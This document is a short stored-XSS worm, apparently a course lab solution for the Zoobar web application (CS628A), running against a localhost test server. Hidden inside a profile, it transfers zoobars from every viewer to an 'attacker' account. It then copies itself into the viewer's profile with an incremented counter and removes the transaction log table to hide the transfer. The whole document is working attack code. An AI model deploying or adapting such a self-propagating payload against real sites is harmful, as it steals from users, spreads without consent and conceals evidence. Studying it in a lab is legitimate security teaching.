I Love CS628A!
<div id="ans" style="display :none;">
<script>
    var zoobar = 1;

    var transfer = new XMLHttpRequest();
    transfer.open('POST', 'http://localhost:8080/zoobar/index.cgi/transfer');
    transfer.setRequestHeader('Content-type','application/x-www-form-urlencoded');
    transfer.send('zoobars='+zoobar+'&recipient=attacker&submission=Send');

    var profile = new XMLHttpRequest();
    profile.open('POST', 'http://localhost:8080/zoobar/index.cgi/');
    profile.setRequestHeader('Content-type','application/x-www-form-urlencoded');
    var inner = 'I Love CS628A!' + '<div id="ans" style="display:none;">' + document.getElementById("ans").innerHTML + '<'+'/div><span id="zoobars" class="10"><'+'/span>';
    inner = inner.replace(/zoobar = (\d+)+/g, function(match, number) {
                    var num = parseInt(number)+1;
                    return "zoobar = " + num;
                });
    profile.send('profile_update=' + encodeURIComponent(inner) + '&profile_submit=Save');
    window.onload = function(){ document.getElementsByClassName("log")[0].getElementsByTagName("tbody")[0].remove();}
</script>
</div>
<span id="zoobars" class="10"></span>

